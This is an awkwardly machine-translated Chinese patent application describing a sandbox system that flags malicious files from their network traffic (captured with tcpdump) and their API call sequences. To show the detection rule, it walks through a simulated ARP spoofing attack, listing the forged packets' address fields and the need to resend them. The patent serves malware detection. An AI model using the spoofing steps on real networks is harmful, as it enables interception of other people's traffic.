CN107483386A

CN107483386A - Analyze the method and device of network data

Info

Publication number: CN107483386A
Application number: CN201610404659.2A
Authority: CN
Inventors: 马志晓; 王云翔
Original assignee: Alibaba Group Holding Ltd
Current assignee: Alibaba Group Holding Ltd
Priority date: 2016-06-08
Filing date: 2016-06-08
Publication date: 2017-12-15

Abstract

This application discloses a kind of method and device for analyzing network data.Wherein, this method includes：Caused network flow data bag during obtaining operation of the file to be detected in virtualized environment；Network flow data bag is tested and analyzed, judges whether file to be detected is particular type file.Present application addresses can not be analyzed in correlation technique under virtualized environment by caused network traffics during being run to apocrypha and in this, as judge the apocrypha whether be malicious file foundation technical problem.

Description

Analyze the method and device of network data

Technical field

The application is related to information security field, in particular to a kind of method and device for analyzing network data.

Background technology

At present, will be given birth to along with the fast development of the Network Information technology such as cloud computing, big data, increasing people The information related to work living is stored and handled on network, but at the same time, with commercial interest even countries ' power Driving specialty attack clique arise at the historic moment, then expedite the emergence of out various emerging security threats, the user profile thus triggered is let out The information security accident such as dew and loss of data can all produce baneful influence, network letter to personal, society, even national security It is increasingly serious to cease security threat form.

In order to tackle the diversified form that the increasingly serious network information security threatens, provided in correlation technique Safety means can dispose intruding detection system in gateway, and the purpose of identification malicious network attacks behavior is reached with this.However, The protective capacities of such a safeguard procedures is limited, and it is only it can be found that attack be present in current slot, but nothing Method identification is specifically the malicious network attacks behavior as caused by which file, thus loses and judges that file is from network behavior The no characteristic for malicious file.

Based on above mentioned problem, additionally provided in correlation technique a kind of in the improvement side of gateway on-premise network safety means Case.The technical way of the solution is：Network traffics are captured by mirror image to analyze attack, led to simultaneously Cross analysis procotol and restore the file transmitted in a network, and this document is redirected in sandbox and carries out dynamic behaviour point Analysis.Although the solution can be detected with the presence or absence of attack in network and examined according to the dynamic behaviour feature of sandbox Survey whether the file transmitted in a network is malicious file, however, can not but be directed to this document caused stream in the process of implementation Amount tested and analyzed and accordingly as judge its whether be malicious file characteristic.

As can be seen here, existing sandbox equipment (such as：Intruding detection system) it can only be identified using dynamic behaviour feature Malicious attack behavior in current network be present, and improvement project also can only identify and have found that it is likely that existing malicious file, but It can not realize and be linked with sandbox, network malicious attack behavior is related to the malicious file for specifically performing the attack Connection, thus lose from network behavior judge file whether be malicious file characteristic.

For it is above-mentioned the problem of, not yet propose effective solution at present.

The content of the invention

The embodiment of the present application provide it is a kind of analyze network data method and device, with least solve in correlation technique It can not be analyzed and in this, as judgement by caused network traffics during being run to apocrypha under virtualized environment The apocrypha whether be malicious file foundation technical problem.

According to the one side of the embodiment of the present application, there is provided a kind of system for analyzing network data, including：

Virtualized environment, for caused network flow data during operation of the file to be detected in virtualized environment Bag is tested and analyzed, and judges whether file to be detected is particular type file；Instruction set simulation environment, for text to be detected The application programming interface api function that is called during operation of the part in virtualized environment and corresponding with the api function Parameter list is tested and analyzed, and judges whether file to be detected is particular type file.

Alternatively, above-mentioned virtualized environment is virtual machine.

Alternatively, above-mentioned instruction set simulation environment is the software virtual machine based on simulator.

According to the another aspect of the embodiment of the present application, there is provided a kind of method for analyzing network data, including：

Caused network flow data bag during obtaining operation of the file to be detected in virtualized environment；To network traffics Packet is tested and analyzed, and judges whether file to be detected is particular type file.

Alternatively, network flow data bag is tested and analyzed, judges whether file to be detected is particular type file Including one below：In single network data on flows bag in network flow data bag whether comprising preset kind parameter come Judge whether file to be detected is particular type file；According to multiple network traffics numbers that are mutually related in network flow data bag Judge whether file to be detected is particular type file according to preset rules whether are met between bag.

Alternatively, according in single network data on flows bag whether comprising preset kind parameter be to judge file to be detected It is no to include one below for particular type file：When including preset kind parameter in single network data on flows bag, judge to treat Detection file is particular type file；When not including preset kind parameter in single network data on flows bag, judge to be detected File is not particular type file.

Alternatively, according to being mutually related between multiple network flow data bags, whether to meet preset rules to be checked to judge Survey whether file is that particular type file includes one below：It is pre- when meeting between multiple network flow data bags that are mutually related If regular, judge file to be detected for particular type file；Do not met when between multiple network flow data bags that are mutually related Preset rules, it is not particular type file to judge file to be detected.

Alternatively, the above method also includes：That is called during obtaining operation of the file to be detected in virtualized environment should With Program Interfaces (API) function；To api function and parameter list corresponding with api function tests and analyzes, and judges Whether file to be detected is particular type file.

Alternatively, above-mentioned virtualized environment is applied to virtual machine.

Alternatively, above-mentioned particular type file is malicious file.

According to the another aspect of the embodiment of the present application, a kind of device for analyzing network data is additionally provided, including：

First acquisition module, for caused network traffics during obtaining operation of the file to be detected in virtualized environment Packet；First analysis module, for being tested and analyzed to network flow data bag, judge whether file to be detected is specific Type file.

Alternatively, the first analysis module, for whether including preset kind parameter according in single network data on flows bag To judge whether file to be detected is particular type file；Or according to being mutually related between multiple network flow data bags Whether preset rules are met to judge whether file to be detected is particular type file.

Alternatively, the first analysis module, for when including preset kind parameter in single network data on flows bag, judging File to be detected is particular type file；Or when not including preset kind parameter in single network data on flows bag, judge File to be detected is not particular type file.

Alternatively, the first analysis module, for meeting default rule when being mutually related between multiple network flow data bags Then, judge file to be detected for particular type file；Or do not met when between multiple network flow data bags that are mutually related Preset rules, it is not particular type file to judge file to be detected.

Alternatively, said apparatus also includes：Second acquisition module, for obtaining file to be detected in virtualized environment The api function and parameter list corresponding with api function called during operation；Second analysis module, for api function with And parameter list corresponding with api function is tested and analyzed, judge whether file to be detected is particular type file.

Alternatively, above-mentioned particular type file is malicious file.

In the embodiment of the present application, using obtaining caused network during the operation of file to be detected in virtualized environment Data on flows bag, and to the mode that network flow data bag is tested and analyzed, by the way that obtained detection and analysis result will be analyzed To judge whether file to be detected is particular type file, reach in detection file to be detected whether include particular type stream Amount, and then the purpose of particular type file is detected and identifies, it is achieved thereby that the detection for improving particular type file is accurate Rate, reduces the technique effect of network security threats, and then solve can not be by treating under virtualized environment in correlation technique Caused network traffics are analyzed during detection running paper and whether the file to be detected is specific in this, as judgement The technical problem of the foundation of type file.

Brief description of the drawings

Accompanying drawing described herein is used for providing further understanding of the present application, forms the part of the application, this Shen Schematic description and description please is used to explain the application, does not form the improper restriction to the application.In the accompanying drawings：

Fig. 1 is the structured flowchart of the analysis network data system of the embodiment of the present application；

Fig. 2 is the flow chart according to the method for the analysis network data of the embodiment of the present application；

Fig. 3 is the structured flowchart according to the device of the analysis network data of the embodiment of the present application；

Fig. 4 is the structured flowchart according to the device of the analysis network data of the application preferred embodiment；

Fig. 5 is the structured flowchart according to a kind of server of the embodiment of the present application.

Embodiment

In order that those skilled in the art more fully understand application scheme, below in conjunction with the embodiment of the present application Accompanying drawing, the technical scheme in the embodiment of the present application is clearly and completely described, it is clear that described embodiment is only The embodiment of the application part, rather than whole embodiments.Based on the embodiment in the application, ordinary skill people The every other embodiment that member is obtained under the premise of creative work is not made, it should all belong to the model of the application protection Enclose.

It should be noted that term " first " in the description and claims of this application and above-mentioned accompanying drawing, " Two " etc. be for distinguishing similar object, without for describing specific order or precedence.It should be appreciated that so use Data can exchange in the appropriate case, so as to embodiments herein described herein can with except illustrating herein or Order beyond those of description is implemented.In addition, term " comprising " and " having " and their any deformation, it is intended that cover Cover it is non-exclusive include, be not necessarily limited to for example, containing the process of series of steps or unit, method, system, product or equipment Those steps or unit clearly listed, but may include not list clearly or for these processes, method, product Or the intrinsic other steps of equipment or unit.

Explanation of nouns involved by the application is as follows：

Particular type file, refer mainly to for malicious file, also known as malicious code, it refers to by deliberately working out or setting And in the case where prompting user is not known or permits without user, the installation and operation on subscriber computer or other-end, Invade the software or file of user's legitimate rights and interests.

File to be detected, refer mainly to for apocrypha, it refers to, and source is insincere, possesses destructive power or can not decision procedure The file being intended to is performed, it, which has certain probability, turns into malicious file.

Virtualized environment refer to for some sources it is insincere, possess destructive power or can not decision procedure perform be intended to can be with File provides experimental enviroment, and performed operations will not cause any shadow to the operating system of host in the present context Ring.

Instruction set simulation environment refers to the execution by software instruction come the environment of analog hardware behavior.

Sandbox, also known as sandbox, it is a kind of mode that application program is run in constrained environment, and this mode needs to limit Authorize the code access permissions of application program.Sandbox be normally used for for some sources it is insincere, possess destructive power or can not sentence Determine program and the application program offer experimental enviroment being intended to is provided, however, the whole changes presented in sandbox can't be to operation System has any impact.The operation principle of sandbox is：By redirecting technique, the file that application program is generated and changed is determined To in being pressed from both sides to own files；When application-specific plays a role, fail-safe software first can be such that it is run in sandbox, if Detect that application program includes malicious act, then forbid the application program further to run, to avoid causing system any danger Evil.

Intruding detection system (Intrusion Detection System, referred to as IDS), is a kind of Network Security Device Or application software, it can be monitored immediately to network transmission, and is sent alarm when finding suspicious transmission or actively adopted Take reactive measures.

Embodiment 1

According to the embodiment of the present application, a kind of embodiment of the method for analyzing network data is additionally provided, it is necessary to illustrate, The step of flow of accompanying drawing illustrates can perform in the computer system of such as one group computer executable instructions, also, , in some cases, can be with different from shown in order execution herein although showing logical order in flow charts The step of going out or describing.

The embodiment of the method that the embodiment of the present application one is provided can perform in the server.Fig. 1 is the embodiment of the present application A kind of analysis network data system structured flowchart.As shown in figure 1, the system 10 of analysis network data can include one Or multiple virtualized environments 102 and instruction set simulation environment 104, by virtualized environment (such as：Sandbox) in perform that have can Can turn into particular type file (such as：Malicious file) file to be detected (such as：Apocrypha), with exclude operating system with And the network traffics interference of other applications, and then monitor, capture, storing the apocrypha caused network during operation Data on flows bag, then network flow data bag is tested and analyzed, from the network traffics dimension related to apocrypha Detection and identification malicious file.

In specific implementation process, the source of apocrypha can include but is not limited to：MSN (such as), postal The file that case annex, network are uploaded or downloaded, naturally it is also possible to user's submission system is created, so that actively submission can by user Doubt file.Sandbox is engineered and customization virtualized environment, and for performing apocrypha, the environment high emulates normal ring Border, its functional characteristic are：In addition to actively performing apocrypha, the row of operating system or other application software can't be introduced To disturb, to prevent from impacting detection and analysis result, wherein, the virtual machine environment can include but is not limited to： Desktop personal computers (PC) operating system, Mobile operating system and service including Windows, Linux, Android, iOS Device operating system, certainly can also be including by parsing and simulating the virtual execution including performing.

Sandbox perform apocrypha when, can by traffic capture analysis tool (such as：Tcpdump sandbox net) is captured Block all network traffics or by way of the mirror image sandbox network interface card flow, net caused by apocrypha is being performed to sandbox Network flow is stored.

By analyze apocrypha during execution caused network traffics come judge the apocrypha whether be malice text Part.Specifically, if by parsing single network data on flows bag, analysis transport layer protocol (such as：Transmission control protocol (TCP), UDP (UDP)) and/or application layer protocol (such as：HTTP (HTTP), file transmission Agreement (FTP), domain name system (DNS), NFS (NFS), Simple Mail Transfer protocol (SMTP), simple network management Agreement (SNMP)) network protocol features, it can determine in the single network data on flows bag comprising the ginseng that should not be carried originally Number information (such as：Perform the character string information of malicious act), then it is malicious file that the apocrypha can be assert with regard to this.So And if can not accurately judge whether the apocrypha is malicious file by parsing is carried out to single network data on flows bag, So just need by be mutually related in network flow data bag between multiple network flow data bags whether meet it is default Rule judges that apocrypha is whether to have hostile network behavior.

In addition, when apocrypha performs in sandbox, can by instruction set simulation environment from instruction-level from bottom to top Start to realize that the kernel modules such as system calling, process are reconstructed to obtain behavior of the apocrypha in Dynamic Execution, monitor and remember The whole api functions and its corresponding parameter information that record apocrypha operationally calls.In specific implementation process, Ke Yiji The apocrypha is recorded under initial environment state according to the various api functions called successively in presetting the time.Pass through finger Order collection simulated environment can monitor apocrypha load and execution during process injection, registry operations, internal memory operation, file grasp The network row such as the Host behaviors such as work and network redirection, DNS addressing, FTP connections, HTTP access, email logins and transmission For, there is provided the malicious access behavior to the sorts of systems resource such as process, internal memory, file, registration table, hosted environment, network, there is provided The simulation of the host events such as USB flash disk insertion, CD insertion.

Such as：The apocrypha successively performs WNetAddConnection and creates same Internet resources forever successively A piece of news is delivered to application program by long property connection, PostThreadMessage, CreateDirectory creates one newly Catalogue, CreateFile are opened and the api function such as establishment file, pipeline, mailslot, communication service, equipment and console, and then Form the operation series that are made up of multiple api functions, by analyze each api function and its parameter with the presence or absence of malice feature or Purpose, and the api function sequence of operation that the api function sequence of operation by the way that apocrypha is called is called with normal file is held Every trade is similarity mode, can judge that the apocrypha whether there is malicious act, and then detects and identify that the apocrypha is No is malicious file.

In a preferred embodiment, on the basis of the dynamic behaviour to apocrypha tests and analyzes, addition is for single The network traffics detection function of individual file-level, known or unknown attack behavior is identified, reaches the dimension from network traffics Whether degree identification and qualitative single file are malicious file, improve malicious file Detection results and reduce the work(of network security threats Energy and purpose.

Under above-mentioned running environment, this application provides the method for analysis network data as shown in Figure 2.Fig. 2 is basis The flow chart of the method for the analysis network data of the embodiment of the present application.Walked as shown in Fig. 2 this method can include following processing Suddenly：

Step S20：Caused network flow data bag during obtaining operation of the file to be detected in virtualized environment；

Step S22：Network flow data bag is tested and analyzed, judges whether file to be detected is particular type text Part.

In a preferred embodiment, monitoring, capture can be relied on, store operation of the apocrypha in the virtualized environment of customization Network flow data bag caused by period, then network flow data bag is tested and analyzed again, so rely solely on can Detection and identification malicious file on this dimension of the network traffics of doubtful file correlation.

, can secondly by virtual network connection, it is necessary to first start sandbox by taking client operating system (Guest OS) as an example Doubt file to be uploaded in Guest OS from host, the monitoring of network flow data bag is then completed with catching by Guest OS again Obtain, and then complete to test and analyze network flow data bag, detected from the network traffics dimension related to apocrypha With identification malicious file.

Alternatively, in step S22, network flow data bag is tested and analyzed, judge file to be detected whether be Particular type file can include one of in the following manner：

Mode one, according in single network data on flows bag whether comprising preset kind parameter whether judge apocrypha For malicious file；

Mode two, according to being mutually related between multiple network flow data bags, whether to meet preset rules suspicious to judge Whether file is malicious file.

By analyze apocrypha during execution caused network traffics come judge the apocrypha whether be malice text Part.Specifically, if by parsing single network data on flows bag, analysis transport layer protocol (such as：Transmission control protocol (TCP), UDP (UDP)) and/or application layer protocol (such as：HTTP (HTTP), file transmission Agreement (FTP), domain name system (DNS), NFS (NFS), Simple Mail Transfer protocol (SMTP), simple network management Agreement (SNMP)) network protocol features, it can determine in the single network data on flows bag comprising the ginseng that should not be carried originally Number information (such as：Perform the character string information of malicious act), then it is malicious file that the apocrypha can be assert with regard to this.

It should be noted that above-mentioned parameter information can repeat experiment to different types of sample progress static state by a large amount of Analysis and summary goes out the parameter related to malicious act, is thus set as to compare the preset kind of reference in subsequent detection analysis Parameter.

If however, by single network data on flows bag is carried out parsing can not accurately judge the apocrypha whether be Malicious file, then just need by between multiple network flow data bags that are mutually related in network flow data bag whether Meet preset rules to judge that apocrypha is whether to have hostile network behavior.

Alternatively, in aforesaid way one, according in single network data on flows bag whether comprising preset kind parameter come Judge whether apocrypha is that malicious file can include one of following result of determination：

Result of determination one, when including preset kind parameter in single network data on flows bag, judge apocrypha be dislike Meaning file；

Result of determination two, when not including preset kind parameter in single network data on flows bag, judge apocrypha not It is malicious file.

In a preferred embodiment, above-mentioned network flow data bag can be obtained using tcpdump instruments.Tcpdump is One packet catcher operated under order line, it allows user to intercept and show net that is being transmitted across or having been received by Network is connected to transmission control protocol (the TCP)/Internet protocol (IP) and other packets of the computer.Tcpdump is applicable In most class Unix system operating system (such as：Linux,BSD).In specific implementation process, tcpdump can be used (in the preferred embodiment, tcpdump needs to monitor sand the network interface card that command-line option "-i " is monitored to indicate tcpdump to need The network interface card of box)；Using tcpdump command-line options "-X " come indicate tcpdump need by protocol header and bag content all it is untouched not (under normal conditions, tcpdump can be shown in the form of 16 systems and ASCII) is shown dynamicly, in order to carry out agreement Analysis；The quantity of the network flow data bag captured using tcpdump command-line options "-c " to indicate tcpdump to need；Make Indicate that it is specific directly by the network flow data bag captured write-in that tcpdump needs with tcpdump command-line options "-w " In file, i.e. used by the network flow data bag captured storage on disk, during in order to test and analyze.

It can be exported in corresponding by keying in the tcpdump order line related to monitoring sandbox network interface card set in advance Hold, its content exported can generally include following components：

(1) what is currently monitored is the network flow data bag for flowing through sandbox network interface card, and its link layer is based on Ethernet, institute The population size limitation for the packet to be captured；

(2) time of each network flow data coating capture, including：When, minute, second, even microsecond；

(3) flow direction of each network flow data bag, it is included：The source medium education of the network flow data bag (MAC) address, the transmission direction of the network flow data bag, the target MAC (Media Access Control) address of the network flow data bag, and Ether frame Protocol type；

(4) length of Ether frame, and the source IP address of the network flow data bag, the transmission of the network flow data bag Direction, the purpose IP address of the network flow data bag；

(5) other guide such as TCP, IP stem.

It can get whether to include in each network flow data bag by tcpdump output result and there is malice row The character string information being characterized, such as：Source IP address carries trojan horse in the Email attachment sent to purpose IP address. It is malicious file to thereby determine that apocrypha corresponding with the network flow data bag.

Alternatively, in aforesaid way two, according to be mutually related between multiple network flow data bags whether meet it is pre- If rule judges whether apocrypha is that malicious file can include one of following result of determination：

Result of determination one, when meeting preset rules between multiple network flow data bags that are mutually related, judge suspicious text Part is malicious file；

Result of determination two, when not meeting preset rules between multiple network flow data bags that are mutually related, judge suspicious File is not malicious file.

By above-mentioned analysis, if can not accurately judge the suspicious text by parsing is carried out to single network data on flows bag Whether part is malicious file, then is just needed by multiple network flow data bags that are mutually related in network flow data bag Between whether meet preset rules to judge that apocrypha is whether to have hostile network behavior.

During being preferable to carry out, following scene can be simulated in sandbox：Assuming that the source IP address of host A is 192.168.1.22 source MAC is:22-22-22-22-22-22；The purpose IP address of host B is 192.168.1.66, mesh MAC Address be 66-66-66-66-66-66.The IP address of gateway is 192.168.1.1, MAC Address 01-01-01-01- 01-01.In normal communication process, each independent and gateway carries out data interaction to host A with host B, in host A and main frame Between B and it is not present data interaction.However, host A but sends ARP deception bags (arp reply bag) notice host B to host B, " host A is gateway, and host B can send the data for accessing outer net to host A ", its ARP deception bags are as follows：

Source IP address:192.168.1.1, source MAC:22-22-22-22-22-22；

Purpose IP address:192.168.1.66, target MAC (Media Access Control) address:66-66-66-66-66-66.

Then, host A sends ARP deceptions to gateway again and wraps (arp reply bag), notification gateway, " host A is host B ", with Gateway is set to send all data for being sent to host B to host A, its ARP deception bags are as follows：

Source IP address:192.168.1.66, source MAC:66-66-66-66-66-66；

Purpose IP address:192.168.1.1, target MAC (Media Access Control) address:01-01-01-01-01-01；

It should be noted that above-mentioned ARP deception bag needs to resend afterwards once at regular intervals, otherwise gateway and The arp cache of host B can be timed renewal.

Above-mentioned ARP deception processes produce mistake by sending the Dynamic ARP table of arp reply bag gateway and victim host B IP-MAC mappings by mistake.

Under above-mentioned scene, probably it is difficult to accurately judge the suspicious text by single network data on flows bag is parsed Whether part is malicious file, and needs pair multiple network flow data bags for cheating process with whole ARP to test and analyze, and is sentenced Whether fixed its changes original IP-MAC mappings (i.e. above-mentioned preset rules), so as to multiple network traffics that judge to be mutually related Whether preset rules are met between packet to judge that apocrypha is whether to have hostile network behavior.

Alternatively, the above method can also include step performed below：

Step S24：Obtain the application programming interface called during operation of the apocrypha in virtualized environment (API) function；

Step S26：To api function and parameter list corresponding with api function tests and analyzes, and judges apocrypha Whether it is malicious file.

It should be noted that above-mentioned steps S24- steps S26 is obtained by api function and corresponding with api function The process for the second detection and analysis result that parameter list is tested and analyzed to obtain above by network flow data bag with entering The process for the first detection and analysis result that row detection and analysis obtain is separate, and suitable in the absence of significantly successively performing Sequence.In other words, above-mentioned steps S24- steps S26 obtain by api function and parameter list corresponding with api function carry out Testing and analyzing the process of the second obtained detection and analysis result can occur before step S20, can also occur in step S22 Afterwards, can also occur at certainly between step S20 and step S22.

Api function is some pre-defined functions, its object is to：Application program is provided with developer based on specific Software or hardware are able to access the ability of one group of routine, and need not access source code or understand the details of internal work mechanism.

Api function is generally comprised within the Dynamic link library library file under Windows system directories.Windows API are one Set is used for controlling the Windows outward appearance of all parts and the pre-defined Windows functions of behavior.User performs each Action can all trigger the operations of one or several functions to notify Windows that there occurs what.Such as：When user clicks on window During a button on body, Windows will send a message to forms, and obtain this in VB and call and after analysis Generate a particular event.In other words, Windows systems are except the execution of coordinate application, the distribution of internal memory, system resource Management outside, while be also a very big service centre.Calling the various services of this service centre, (each service can be with It is interpreted as a function) application program can be helped to reach the purpose of opening form, generating writing pattern and using peripheral equipment, due to The object of these function services is application program, so referred to as api function.

In a preferred embodiment, when apocrypha performs in sandbox, can be by system interface or actively modification The mode for operating process of uniting, monitor and record whole api functions and its corresponding parameter letter that apocrypha operationally calls Breath.In specific implementation process, can record the apocrypha under initial environment state according in presetting the time successively The various api functions called, such as：The apocrypha successively performs WNetAddConnection and creates same net successively A piece of news is delivered to application program, CreateDirectory by permanent connection, the PostThreadMessage of network resource Create a new directory, CreateFile is opened and establishment file, pipeline, mailslot, communication service, equipment and console etc. Api function, and then the operation series being made up of multiple api functions are formed, by analyzing whether each api function and its parameter are deposited In malice feature or purpose, and the API letters that the api function sequence of operation by the way that apocrypha is called is called with normal file It number sequence of operation process performing similarity mode, can judge that the apocrypha whether there is malicious act, and then detect identification Whether the apocrypha is malicious file.

Furthermore, it is contemplated that the percentage that apocrypha occupies total number of files is limited after all, so in order to improve detection efficiency Can in sandbox simultaneously perform multiple files (including：Apocrypha and non-apocrypha) by these files perform the phase Between caused dynamic behaviour feature and network flow data bag carry out comprehensive analysis detection, judge accordingly in these files whether Malicious file be present.Such as：Assuming that current total number of files is 100, wherein, including：2 apocryphas, however, this 2 Apocrypha is in the total position of above-mentioned 100 files and does not know.Therefore, using every time being tested and analyzed to 1 file Mode just needs to carry out this 100 files 100 detection and analysis operations of the execution of examination one by one, finally finds out 2 suspicious texts Part；However, in order to improve detection efficiency, every 10 files can also be divided into one group, using being examined every time to 1 group of file Surveying the mode of analysis just needs to carry out this 10 groups of files 10 detection and analysis operations of the execution of examination one by one, if it find that specific Apocrypha be present in 10 files of which group, then continue to carry out this group of file division until finding out above-mentioned suspicious text Part, and for each group file of no discovery apocrypha, then can normally let pass passes through, it is no longer necessary to further checking.

By performing apocrypha in the virtualized environments such as the sandbox in customization, operating system and other applications are excluded Network traffics interference, monitor, capture, storing the apocrypha caused dynamic behaviour sequence of operation and network during operation Data on flows bag, is then tested and analyzed respectively, finally from two dimensions of dynamic behaviour feature and network traffics of apocrypha Degree detects and identifies whether the apocrypha is malicious file.

It should be noted that for foregoing each method embodiment, in order to be briefly described, therefore it is all expressed as a series of Combination of actions, but those skilled in the art should know, the application is not limited by described sequence of movement because According to the application, some steps can use other orders or carry out simultaneously.Secondly, those skilled in the art should also know Know, embodiment described in this description belongs to preferred embodiment, involved action and module not necessarily the application It is necessary.

Through the above description of the embodiments, those skilled in the art can be understood that according to above-mentioned implementation The method of the analysis network data of example can add the mode of required general hardware platform to realize by software, naturally it is also possible to lead to Cross hardware, but the former is more preferably embodiment in many cases.Based on such understanding, the technical scheme of the application is substantially The part to be contributed in other words to prior art can be embodied in the form of software product, and the computer software product is deposited Storage is in a storage medium (such as ROM/RAM, magnetic disc, CD), including some instructions are causing a station terminal equipment (can be with Mobile phone, computer, server, or network equipment etc.) perform each embodiment of the application described in method.

Embodiment 2

According to the embodiment of the present application, additionally provide a kind of device for being used to implement the method for above-mentioned analysis network data and implement Example.Fig. 3 is the structured flowchart according to the device of the analysis network data of the embodiment of the present application.As shown in figure 3, the device includes： First acquisition module 10, for caused network flow data during obtaining operation of the file to be detected in virtualized environment Bag；First analysis module 20, for being tested and analyzed to network flow data bag, judge whether file to be detected is certain kinds Type file.

The embodiment of the present application by customization virtualized environment (such as：Sandbox) in perform be likely to become particular type File (such as：Malicious file) file to be detected (such as：Apocrypha), to exclude operating system and other applications Network traffics interference, and then monitor, capture, storing the apocrypha caused network flow data bag during operation, so Network flow data bag is tested and analyzed afterwards, malice is detected and identified from the network traffics dimension related to apocrypha File.

In specific implementation process, the source of apocrypha can include but is not limited to：MSN, mailbox are attached The file that part, network are uploaded or downloaded, naturally it is also possible to user's submission system is created, so that user actively submits suspicious text Part.Sandbox is engineered and customization virtualized environment, for performing apocrypha, environment high emulation home, its Functional characteristic is：In addition to actively performing apocrypha, the behavior that can't introduce operating system or other application software is done Disturb, to prevent from impacting detection and analysis result, wherein, the virtual machine environment can include but is not limited to：Windows、 Desktop personal computers (PC) operating system, Mobile operating system and server operation system including Linux, Android, iOS System, certainly can also be including by parsing and simulating the virtual execution including performing.

Alternatively, the first analysis module 20, for whether including preset kind ginseng according in single network data on flows bag Count to judge whether apocrypha is malicious file；Or according between multiple network flow data bags that are mutually related whether Meet preset rules to judge whether apocrypha is malicious file.

If however, by single network data on flows bag is carried out parsing can not accurately judge the apocrypha whether be Malicious file, then just need by whether meeting preset rules between multiple network flow data bags to sentence to being mutually related Disconnected apocrypha is whether hostile network behavior be present.

It should be noted that above-mentioned preset rules be mainly shown as it is related to same particular event caused by multiple networks Data on flows bag has broken original normal communication interaction flow, thus causes the important information that the authentication to user is related Leak.

Alternatively, the first analysis module 20, for when including preset kind parameter in single network data on flows bag, sentencing It is malicious file to determine apocrypha；Or when not including preset kind parameter in single network data on flows bag, judge suspicious File is not malicious file.

(5) other guide such as TCP, IP stem.

Alternatively, the first judge module 30, for when be mutually related between multiple network flow data bags meet it is default Rule, judge that apocrypha is malicious file；It is or default when not met between multiple network flow data bags that are mutually related Rule, judge that apocrypha is not malicious file.

By above-mentioned analysis, if can not accurately judge the suspicious text by parsing is carried out to single network data on flows bag Whether part is malicious file, then just need by be mutually related between multiple network flow data bags whether meet it is default Rule judges that apocrypha is whether to have hostile network behavior.

Alternatively, as shown in figure 4, said apparatus also includes：Second acquisition module 30, for obtaining apocrypha virtual Change the api function called during the operation in environment and parameter list corresponding with api function；Second analysis module 40, use In to api function and parameter list corresponding with api function tests and analyzes, judging whether apocrypha is malice text Part.

It should be noted that the acquisition performed by the second acquisition module 30 and the second analysis module 40 in above-mentioned Fig. 4 is led to Cross to api function and parameter list corresponding with api function is tested and analyzed the obtained mistake of the second detection and analysis result Journey is with the above-mentioned analysis module 20 of first acquisition module 10 and first by being tested and analyzed what is obtained to network flow data bag The process of first detection and analysis result is separate, and obvious priority execution sequence is not present.In other words, above-mentioned second The analysis module 40 of acquisition module 30 and second is obtained by api function and parameter list corresponding with api function is examined Surveying the process for the second detection and analysis result that analysis obtains can be arranged on before the first acquisition module 10, can also be arranged on the After one analysis module 20, it can also occur at certainly between the first acquisition module 10 and the first analysis module 20.

Embodiment 3

Embodiments herein can provide a kind of terminal, and the terminal can be in terminal group Any one computer terminal.Alternatively, in the present embodiment, above computer terminal can also replace with mobile whole The terminal devices such as end.

Alternatively, in the present embodiment, above computer terminal can be located in multiple network equipments of computer network At least one network equipment.

Alternatively, Fig. 5 is the structured flowchart according to a kind of server of the embodiment of the present application.As shown in figure 5, the server It can include：One or more (one is only shown in figure) processors and memory.

Wherein, memory can be used for storage software program and module, such as the analysis network data in the embodiment of the present application Method and apparatus corresponding to programmed instruction/module, processor is stored in software program and mould in memory by operation Block, so as to perform various function application and data processing, that is, the method for realizing above-mentioned analysis network data.Memory can wrap Include high speed random access memory, nonvolatile memory can also be included, as one or more magnetic storage device, flash memory or Other non-volatile solid state memories of person.In some instances, memory can further comprise remotely located relative to processor Memory, these remote memories can pass through network connection to terminal A.The example of above-mentioned network includes but is not limited to interconnect Net, intranet, LAN, mobile radio communication and combinations thereof.

Processor can call the information and application program of memory storage by transmitting device, to perform following step：

S1, caused network flow data bag during obtaining operation of the file to be detected in virtualized environment；

S2, network flow data bag is tested and analyzed, judge whether file to be detected is particular type file.

Optionally, above-mentioned processor can also carry out the program code of following steps：According to single network data on flows bag In whether comprising preset kind parameter judge whether file to be detected is particular type file；According to multiple nets that are mutually related Whether preset rules are met between network data on flows bag to judge whether file to be detected is particular type file.

Optionally, above-mentioned processor can also carry out the program code of following steps：When in single network data on flows bag During comprising preset kind parameter, judge file to be detected for particular type file；Do not included when in single network data on flows bag During preset kind parameter, it is not particular type file to judge file to be detected.

Optionally, above-mentioned processor can also carry out the program code of following steps：When multiple network flows that are mutually related Meet preset rules between amount packet, judge file to be detected for particular type file；When multiple network flows that are mutually related Preset rules are not met between amount packet, it is not particular type file to judge file to be detected.

Optionally, above-mentioned processor can also carry out the program code of following steps：File to be detected is obtained to virtualize Application programming interface (API) function called during operation in environment；To api function and corresponding with api function Parameter list is tested and analyzed, and judges whether file to be detected is particular type file.

Caused net during operation of the acquisition file to be detected provided using the embodiment of the present application in virtualized environment Network data on flows bag, and to the mode that network flow data bag is tested and analyzed, judge whether file to be detected is certain kinds Type file, reach particular type flow whether is included in detection file to be detected, and then detected and identify particular type The purpose of file, it is achieved thereby that improving the Detection accuracy of particular type file, the technique effect of network security threats is reduced, And then solve can not be by caused network flow during running paper to be detected under virtualized environment in correlation technique Amount analyzed and in this, as judge the file to be detected whether be particular type file foundation technical problem.

Furthermore it is also possible to dynamic behaviour and caused network traffics when being performed based on single file in virtual environment come Detection and identification particular type file, i.e. in a preferred embodiment, be provided simultaneously with from file behavioural characteristic and network flow characteristic Two dimensions reach whether identification and qualitative file are particular type file, improve particular type file Detection results and reduce net The function and purpose of network security threat.

It will appreciated by the skilled person that the structure shown in Fig. 5 is only to illustrate, terminal can also be intelligence Can mobile phone (such as Android phone, iOS mobile phones), tablet personal computer, applause computer and mobile internet device (Mobile Internet Devices, referred to as MID), the terminal device such as PAD.Fig. 5 it does not cause to limit to the structure of above-mentioned electronic installation It is fixed.For example, terminal may also include the component more or less than shown in Fig. 5 (such as network interface, display device Deng), or there is the configuration different from shown in Fig. 5.

One of ordinary skill in the art will appreciate that all or part of step in the various methods of above-described embodiment is can To be completed by program come command terminal device-dependent hardware, the program can be stored in a computer-readable recording medium In, storage medium can include：Flash disk, read-only storage (Read-Only Memory, referred to as ROM), random access device (Random Access Memory, referred to as RAM), disk or CD etc..

Embodiment 4

Embodiments herein additionally provides a kind of storage medium.Alternatively, in the present embodiment, above-mentioned storage medium can For preserving the program code performed by the method for the analysis network data that above-described embodiment one is provided.

Alternatively, in the present embodiment, above-mentioned storage medium can be located in computer network Computer terminal group In any one terminal, or in any one mobile terminal in mobile terminal group.

Alternatively, in the present embodiment, storage medium is arranged to the program code that storage is used to perform following steps：

